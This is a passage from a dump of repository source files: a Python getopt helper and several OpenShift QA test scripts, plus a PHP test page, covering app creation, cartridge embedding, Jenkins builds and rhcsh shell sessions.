args[1:])\n\n return opts, longopts, args\n\ndef _do_longs(longopts, opt):\n try:\n i = opt.index('=')\n except ValueError:\n raise GetoptError('long options require arguments in the form opt=arg.', opt)\n opt, optarg = opt[2:i], opt[i+1:]\n longopts[opt] = optarg\n return longopts\n\ndef _do_shorts(opts, optstring, shortopts, args):\n while optstring != '':\n opt, optstring = optstring[0], optstring[1:]\n if _short_has_arg(opt, shortopts):\n if optstring == '':\n if not args:\n raise GetoptError('option -%s requires argument' % opt,\n opt)\n optstring, args = args[0], args[1:]\n optarg, optstring = optstring, ''\n else:\n optarg = ''\n opts.append(('-' + opt, optarg))\n return opts, args\n\ndef _short_has_arg(opt, shortopts):\n for i in range(len(shortopts)):\n if opt == shortopts[i] != ':':\n return shortopts.startswith(':', i+1)\n raise GetoptError('option -%s not recognized' % opt, opt)\n\n\n# XXX\nclass Arguments(object):\n def __init__(self, optlist=\"\"):\n self._optlist = optlist\n self._opts = None\n self._longopts = None\n self._args = None\n \n def parse(args):\n optlist, self._longopts, self._args = getopt(args, self._optlist)\n for opt, optarg in optlist:\n self._opts[opt] = optarg\n\n def __getitem__(self, idx):\n try:\n i = int(idx)\n except (ValueError, TypeError):\n return self._opts[idx]\n else:\n return self._args[i]\n\n def __iter__(self):\n return iter(self._args)\n\n\n# self test\ndef _test():\n import sys\n dopt = 0\n try:\n optlist, extraopts, args = getopt([ \"-d\", \"--opt1=1\", \"arg1\", \"arg2\"], \"d\")\n except GetoptError, err:\n print >>sys.stderr, \"ERR:\", err\n for opt, optarg in optlist:\n if opt == \"-d\":\n dopt = 1\n print extraopts\n print dopt\n print args\n\nif __name__ == \"__main__\":\n _test()\n" }, { "alpha_fraction": 0.7612359523773193, "alphanum_fraction": 0.7696629166603088, "avg_line_length": 26.230770111083984, "blob_id": "f1436d78a1b61cf1a52df3eb611a249f6e8497e4", "content_id": "c539718ccc020415e0b8fb9168a05aab3e5a0db0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 356, "license_type": "no_license", "max_line_length": 73, "num_lines": 13, "path": "/automation/Example/pages/testem.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from hta2.lib.selenium.webdriver import Firefox\nfrom hta2.tests.bugzilla.webui.pages.homepage import HomePage\n#from hta2.tests.bugzilla.webui.ui_mapping import homepage as homepage_ui\n\nff = Firefox()\nhomepage = HomePage(ff)\nhomepage.login()\nhomepage.open_admin_page()\n\n\n\n#class HomePageTest(UITestCase):\n# \"\"\"Base class for User portal test cases.\"\"\"\n\n\n" }, { "alpha_fraction": 0.5190063714981079, "alphanum_fraction": 0.5315518975257874, "avg_line_length": 34.42222213745117, "blob_id": "04ea88bc7e23491457718d7273850b907d254cef", "content_id": "ea4017b7370b1630bc0710590477fbed5d47c650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7971, "license_type": "no_license", "max_line_length": 100, "num_lines": 225, "path": "/automation/open/testmodules/RT/node/login_via_rhcsh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 30, 2011\n\n[US548][Runtime][rhc-node] Log into user application via rhcsh for debugging\nhttps://tcms.engineering.redhat.com/case/126301/?from_plan=4962\n\"\"\"\nimport sys\nimport os\n\nimport rhtest\nimport common\nimport OSConf\nimport pexpect\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.app_name = 'php'\n self.app_type = common.app_types[self.app_name]\n self.summary =\"[US548][Runtime][rhc-node] Log into user application via rhcsh for debugging\"\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass LoginViaRHCSH(OpenShiftTest):\n def test_method(self):\n self.add_step(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd, \n False],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\"get ssh url\",\n OSConf.get_ssh_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"run rhcsh test with pexpect\",\n self.rhcsh_test_1,\n expect_return = 0)\n\n self.add_step(\"embed mysql into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-mysql-5.1\"],\n expect_return = 0)\n\n if self.get_run_mode() != 'OnPremise':\n self.add_step(\"embed phpmyadmin into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-phpmyadmin-3.4\"],\n expect_return = 0)\n\n self.add_step(\"remove mysql from app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"remove-mysql-5.1\"],\n expect_return = 0)\n \n self.add_step(\"remove phpmyadmin from app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"remove-phpmyadmin-3.4\"],\n expect_return = 0)\n \n self.add_step(\"embed mongodb into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-mongodb-2.2\"],\n expect_return = 0)\n \n self.add_step(\"embed rockmongo into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-rockmongo-1.1\"],\n expect_return = 0)\n \n self.add_step(\"embed metrics into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-metrics-0.1\"],\n expect_return = 0)\n\n self.add_step(\"run rhcsh test with pexpect\",\n self.rhcsh_test_2,\n expect_return = 0)\n\n self.add_step(\"get ssh url\",\n OSConf.get_ssh_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"run ssh with valid command\",\n \"ssh __OUTPUT__[2] ls\",\n expect_str = ['git', self.app_name],\n expect_return = 0)\n\n self.add_step(\"run ssh with valid command\",\n \"ssh -t __OUTPUT__[2] rhcsh ls -al &> ls.log\")\n\n self.add_step(\"check redirected output\",\n \"cat ls.log\",\n expect_str = ['git', self.app_name, '.gitconfig'],\n #unexpect_str = ['WARNING: This ssh terminal was started without a tty.'],\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def rhcsh_test_1(self):\n app_url = OSConf.get_app_url(self.app_name)\n ssh_url = OSConf.get_ssh_url(self.app_name)\n p = pexpect.spawn('ssh %s'% ssh_url, timeout=400)\n p.logfile = sys.stdout\n #index = p.expect([OSConf.get_app_url(self.app_name), pexpect.EOF, pexpect.TIMEOUT])\n\n p.expect('Welcome to OpenShift shell')\n p.expect(app_url)\n p.sendline('ls -l ~/app-root/data/.bash_profile')\n p.expect('-rwx.*.bash_profile')\n #p.sendline('ls -l ~/app-root/data/.bash_history')\n #p.expect('-rwx.*.bash_history')\n p.sendline('ls')\n p.expect('git')\n p.sendline('cd %s/data/ && touch test && echo \"test_text\" > test ; echo $?'% self.app_type)\n p.expect('0')\n p.sendline('cat test')\n p.expect('test_text')\n p.sendline('rm -f test ; ls test || echo \"ok\"')\n p.expect('ok')\n p.sendline('ps -efww')\n p.expect('/usr/bin/rhcsh -i')\n p.sendline('export test=\"rhcsh-test\"; echo $test')\n p.expect('rhcsh-test')\n p.sendline('help')\n p.expect('Help menu:')\n #p.sendline('tail_all') ### XXX do we need tail_all test?\n #p.expect('==> /var/lib/(.*)-000000-(.*) <==')\n #p.expect('==> /var/lib/(.*)-000000-(.*) <==')\n # p.sendcontrol('c')\n #p.sendcontrol('d')\n #p.sendline('exit')\n p.expect('timed out waiting for input: auto-logout', timeout=360)\n p.expect('Connection to %s closed.'% app_url)\n return 0\n\n def rhcsh_test_2(self):\n app_url = OSConf.get_app_url(self.app_name)\n ssh_url = OSConf.get_ssh_url(self.app_name)\n app_uuid = OSConf.get_app_uuid(self.app_name)\n p = pexpect.spawn('ssh -t %s rhcsh'% ssh_url)\n p.logfile = sys.stdout\n\n p.expect('Welcome to OpenShift shell')\n p.expect(app_url)\n p.sendline('ps -efww | grep \"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect(\"2\")\n else:\n p.expect(\"6\")\n p.sendline('ctl_app stop')\n time.sleep(2)\n p.expect(app_url)\n #p.expect(\"Waiting for stop to finish\")\n p.sendline('ps -efww | grep \"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect(\"0\")\n else:\n p.expect([\"4\"])\n p.sendline('ctl_app start')\n time.sleep(2)\n p.expect(app_url)\n p.sendline('ps -efww | grep \"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect(\"2\")\n else:\n p.expect([\"6\"])\n #p.sendline('ctl_app restart')\n\t#p.expect('?')\n\t#p.sendline('1')\n #time.sleep(2)\n #p.expect(app_url)\n #p.sendline('ps -efww | grep \"/usr/sbin/httpd\" | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s httpd | wc -l' %(app_uuid))\n #if self.get_run_mode() == 'OnPremise':\n # p.expect(\"2\")\n #else:\n # p.expect([\"6\"])\n p.sendline('ctl_all stop')\n p.expect(app_url)\n time.sleep(2)\n p.sendline('ps -efww | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s | wc -l' %(app_uuid))\n p.expect([\"5\"])\n p.sendline('ctl_all start')\n p.expect(app_url)\n time.sleep(2)\n p.sendline('ps -efww | grep -v \"grep\" | wc -l')\n #p.sendline('pgrep -u %s | wc -l' %(app_uuid))\n if self.get_run_mode() == 'OnPremise':\n p.expect([\"10\", \"11\"])\n else:\n p.expect([\"17\", \"18\"])\n p.sendline('exit')\n p.expect('Connection to %s closed.'% app_url)\n return 0\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginViaRHCSH)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5915870070457458, "alphanum_fraction": 0.5961759090423584, "avg_line_length": 32.08860778808594, "blob_id": "1b94f604f2b3eb3bad9e25ac8dc0c71de7b2906b", "content_id": "73c30f0935fd2fe597b9fea3f9557d49fa96b19e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2615, "license_type": "no_license", "max_line_length": 105, "num_lines": 79, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nMichal Zimen\[email protected]\nApr 04, 2012\n[rhc-cartridge] embed MySQL instance to RAW application\nhttps://tcms.engineering.redhat.com/case/???/\n\"\"\"\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary =\"[rhc-cartridge] embed MySQL instance to an application\"\n try:\n self.app_type = common.app_types[self.config.test_variant]\n except:\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"app4mysql\"\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysql(OpenShiftTest):\n def test_method(self):\n mysql = common.cartridge_types['mysql']\n steps_list = []\n steps_list.append( testcase.TestCaseStep(\"Create a %s app\" % (self.app_type), common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5213077664375305, "alphanum_fraction": 0.5347237586975098, "avg_line_length": 49.10734558105469, "blob_id": "52533065135924a3175d27db077da198fe5ada2a", "content_id": "92f5651409abfd234cc42474c2a7b09f91041d82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8870, "license_type": "no_license", "max_line_length": 139, "num_lines": 177, "path": "/automation/open/testmodules/RT/cartridge/jenkins_negative_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1178 & US1034] [rhc-cartridge] Negative testing for jenkins cartridge \nhttps://tcms.engineering.redhat.com/case/122372/\n\"\"\"\nimport os,sys,re\nimport time\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default\")\n self.test_variant= \"php\"\n\n self.app_name = self.test_variant.split('-')[0] + \"negative\"\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n self.output = dict()\n tcms_testcase_id=122372\n \n common.env_setup()\n\n def finalize(self):\n #OSConf.initial_conf()\n pass\n\nclass JenkinsNegativeTesting(OpenShiftTest):\n def test_method(self):\n case=testcase.TestCase(\"[US1178 & US1034] [rhc-cartridge] Negative testing for jenkins cartridge \", [])\n try:\n # 1.Create an app\n (retcode, self.output[1]) =testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = \"the app should be created successfully\",\n expect_return=0).run()\n\n # 2.Try to embed jenkins client to the app without jekins server app created\n (retcode, self.output[2]) = testcase.TestCaseStep(\"2.Try to embed jenkins client to the app without jekins server app created\",\n common.embed,\n function_parameters=[self.app_name, \"add-jenkins-client-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the jenkins client should not be embedded\",\n expect_return=\"!0\",\n expect_string_list=[\"Jenkins server does not exist\",],).run()\n\n # 3.Access app's url to make sure it's still available\n app_url = \"https://\" + OSConf.get_app_url(self.app_name)\n (retcode, self.output[3]) =testcase.TestCaseStep(\"3.Access app's url to make sure it's still available\",\n common.grep_web_page,\n function_parameters=[app_url, \"Welcome to OpenShift\", \"-k -H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"The app should be available\",\n expect_return=0).run()\n\n # 4.Create a jenkins server app\n (retcode, self.output[4]) = testcase.TestCaseStep(\"4. Create an jenkins app\",\n common.create_app,\n function_parameters=[\"server\", \n \"jenkins-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n False],\n expect_description=\"the jenkins app should be created successfully\",\n expect_return=0).run()\n time.sleep(10)\n\n # 5.Embed jenkins client to the app\n (retcode, self.output[5]) = testcase.TestCaseStep(\"5.Embed jenkins client to the app\",\n common.embed,\n function_parameters=[self.app_name, \n \"add-jenkins-client-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the jenkins client should be embedded successfully\",\n expect_return=0,\n try_count=3,\n try_interval=5).run()\n\n # 6.Make some change in the git repo and git push\n test_html = \"my test page\"\n type_to_cmd = { \n \"php-5.3\" : \"echo '%s' > %s/php/index.php\" % (test_html, self.git_repo),\n \"jbossas-7\" : \"echo '%s' > %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"python-2.6\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/wsgi/application\" % (test_html, self.git_repo),\n \"ruby-1.8\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/config.ru\" % (test_html, self.git_repo),\n \"perl-5.10\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/perl/index.pl\" % (test_html, self.git_repo)\n }\n cmd = type_to_cmd[self.app_type]\n (retcode, self.output[6]) = testcase.TestCaseStep(\"6.Make some changes in the git repo and git push\",\n cmd,\n expect_description=\"the git repo is modified successfully and git push succeeds\",\n expect_return=0).run()\n # Trigger jenkins build\n (retcode, self.output[6]) = testcase.TestCaseStep(\"6.Trigger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.git_repo],\n expect_description=\"the git repo is modified successfully and git push succeeds\",\n expect_return=True).run()\n\n # 7.Check if the changes take effect\n (retcode, self.output[7]) = testcase.TestCaseStep(\"7.Check if the changes take effect\",\n common.grep_web_page,\n function_parameters=[app_url, test_html, \"-k -H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0).run()\n\n # 8.remove the jenkins server app\n (retcode, self.output[8]) = testcase.TestCaseStep(\"8. Destroy the jenkins server app\",\n common.destroy_app,\n function_parameters=[\"server\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the jenkins app should be destroyed successfully\",\n expect_return=0).run()\n\n # 9.Do some change to normal app's git repo and git push\n old_html = test_html\n test_html = \"This is a test page\"\n type_to_cmd = { \n \"php-5.3\" : \"echo '%s' > %s/php/index.php\" % (test_html, self.git_repo),\n \"jbossas-7\" : \"echo '%s' > %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"python-2.6\" : \"sed -i -e 's/%s/%s/g' %s/wsgi/application\" % (old_html, test_html, self.git_repo),\n \"ruby-1.8\" : \"sed -i -e 's/%s/%s/g' %s/config.ru\" % (old_html, test_html, self.git_repo),\n \"perl-5.10\" : \"sed -i -e 's/%s/%s/g' %s/perl/index.pl\" % (old_html, test_html, self.git_repo) }\n cmd = type_to_cmd[self.app_type]\n (retcode, self.output[9]) = testcase.TestCaseStep(\"9.Make some changes in the git repo and git push again\",\n cmd,\n expect_description=\"Git push should succeed\",\n expect_return=0).run()\n # Trigger jenkins build\n (retcode, self.output[9]) = testcase.TestCaseStep(\"Trigger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.git_repo],\n expect_description=\"Git push should succeed\",\n expect_return=True).run()\n\n # 10.Check if the changes take effect\n (retcode, self.output[10]) = testcase.TestCaseStep(\"10.Check if the changes take effect\",\n common.grep_web_page,\n function_parameters=[app_url, test_html, \"-k -H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0).run()\n\n common.destroy_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n \n\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsNegativeTesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5241718888282776, "alphanum_fraction": 0.5519248247146606, "avg_line_length": 29.602739334106445, "blob_id": "1f656c48dab9b74c89be8b0c16058376ec380d01", "content_id": "b5fa1105c6aa8ca33a9889497dc2a0219116873f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2234, "license_type": "no_license", "max_line_length": 86, "num_lines": 73, "path": "/automation/open/testmodules/RT/client/data/snapshot_restore_data_dir/index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\n$OPENSHIFT_DATA_DIR = getenv(\"OPENSHIFT_DATA_DIR\");\n$target_file = $OPENSHIFT_DATA_DIR.\"php_data_test\";\n\nif(!empty($_GET[\"action\"])) {\n $action_name = $_GET[\"action\"];\n if ($action_name == \"create\"){\n $key_string = \"snapshot_restore_data_dir_test1\";\n $command1 = \"echo \".$key_string.\" >\".$target_file.\" 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n $command2 = \"dd if=/dev/urandom of=\".$OPENSHIFT_DATA_DIR.\"bigfile bs=1M count=1\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"cat \".$target_file.\" 2>&1 && [ -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 and $ret2 == 0 and $ret_tmp == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n } elseif ($action_name == \"modify\") {\n $key_string = \"snapshot_restore_data_dir_test2\";\n $command1 = \"echo \".$key_string.\" >\".$target_file.\" 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n $command2 = \"rm -f \".$OPENSHIFT_DATA_DIR.\"bigfile\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"cat \".$target_file.\" 2>&1 && [ ! -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 and $ret2 == 0 and $ret_tmp == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n } else {\n $command = \"cat \".$target_file.\" 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n $command2 = \"[ -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n if ($ret2 == 0) {\n echo \"file: bigfile exists\\n\";\n }\n else {\n echo \"file: bigfile doesn't exist\\n\";\n }\n }\n} else {\n $command = \"cat \".$target_file.\" 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n $command2 = \"[ -f \".$OPENSHIFT_DATA_DIR.\"bigfile ]\";\n echo \"Command: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n if ($ret2 == 0) {\n echo \"file: bigfile exists\\n\";\n }\n else {\n echo \"file: bigfile does not exist\\n\";\n }\n}\n\n?>\n" }, { "alpha_fraction": 0.5224581956863403, "alphanum_fraction": 0.5290738344192505, "avg_line_length": 46.471073150634766, "blob_id": "c6413bfe6c77cd8bebcb9fc4fd0f5e4021272968", "content_id": "14111f798a0c46890fdf10aa6bfd8814e55f06c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5744, "license_type": "no_license", "max_line_length": 194, "num_lines": 121, "path": "/automation/open/testmodules/RT/cartridge/auto_embed_jenkins_to_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type1 = \"ruby-1.8\"\n self.app_name1 = \"testapp1\"\n self.app_type2 = \"python-2.6\"\n self.app_name2 = \"testapp2\"\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass AutoEmbedJenkinsToApp(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Get 'rhc app create' help output to make sure it supoort auto enable jenkins\",\n \"rhc help app create\",\n expect_return=0,\n expect_string_list=['Create an application', 'enable-jenkins \\[NAME\\]']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create app with --enable-jenkins option\",\n \"rhc app create %s %s -l %s -p '%s' --enable-jenkins %s\" %(self.app_name1, self.app_type1, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"App with jenkins created success\",\n expect_return=0,\n expect_string_list=[\"Jenkins client 1.4 has been added to\"]\n )\n# expect_string_list=['Jenkins created successfully']\n# )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Get user info to check jenkins app be listed\",\n \"rhc domain show -l %s -p '%s' %s\" %(self.user_email,self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=['jenkins-1.4', 'applications in your domain', '%s-build' %(self.app_name1)]\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Do some change in app repo, and git push to trigger jenkins build\",\n \"cd %s && touch test && git add test && git commit -a -m 'update' && git push \" %(self.app_name1),\n expect_return=0,\n expect_string_list=['Executing Jenkins build', 'Waiting for build to schedule', 'SUCCESS']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Delete one app to release app quota for next step\",\n \"rhc app delete %s -l %s -p '%s' --confirm %s\" %(self.app_name1, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n step = testcase.TestCaseStep(\"Delete builder app to release app quota for next step\",\n \"rhc app delete %s -l %s -p '%s' --confirm %s\" %(self.app_name1 + 'bldr', self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create another app without --enable-jenkins option\",\n \"rhc app create %s %s -l %s -p '%s' %s\" %(self.app_name2, self.app_type2, self.user_email,self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Get user info to check jenkins app be listed\",\n \"rhc domain show -l %s -p '%s' %s\" %(self.user_email,self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=[self.app_name2],\n unexpect_string_list=['%s-build' %(self.app_name2)]\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Do some change in app repo, and git push\",\n \"cd %s && touch test && git add test && git commit -a -m 'update' && git push \" %(self.app_name2),\n expect_description=\"There should NO jenkins build\",\n expect_return=0,\n unexpect_string_list=['Waiting for build to schedule', 'Executing Jenkins build']\n )\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[US1279] [rhc-client] Automatically embed jenkins to your application via --enable-jenkins option of rhc cliet tools\",\n self.steps_list)\n\n case.add_clean_up(OSConf.initial_conf,function_parameters=[])\n case.run()\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AutoEmbedJenkinsToApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5760909914970398, "alphanum_fraction": 0.5921298265457153, "avg_line_length": 39.30826950073242, "blob_id": "8e828d4dca491208e68dcb78c0d6bf08ba1a9613", "content_id": "08eabf845dd4314b13338829b6ca9321de6b03a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5362, "license_type": "no_license", "max_line_length": 117, "num_lines": 133, "path": "/automation/open/testmodules/RT/security/polyinstantiation_tmp_dir.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[Security] Polyinstantiation of /tmp and /var/tmp for new application by using pam_namespace\nhttps://tcms.engineering.redhat.com/case/122331/?from_plan=4962\n\"\"\"\n\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[Security] Polyinstantiation of /tmp and /var/tmp for new application by using pam_namespace\"\n self.info(self.summary)\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"WARN: Missing OPENSHIFT_test_name, used `php` as default.\")\n test_name= \"php\"\n\n self.app_type = common.app_types[test_name]\n self.app_name1 = test_name + \"1\"\n self.app_name2 = test_name + \"2\"\n\n if test_name == \"php\":\n file_name = \"polyinstantiation_tmp_dir_index.php\"\n self.source_file = \"%s/data/%s\" %(WORK_DIR, file_name)\n self.target_file1 = \"%s/php/index.php\" %(self.app_name1)\n self.target_file2 = \"%s/php/index.php\" %(self.app_name2)\n self.url_path1 = \"index.php?action=create\"\n self.url_path2 = \"index.php\"\n elif test_name == \"wsgi\":\n file_name = \"polyinstantiation_tmp_dir_application.py\"\n self.source_file = \"%s/data/%s\" 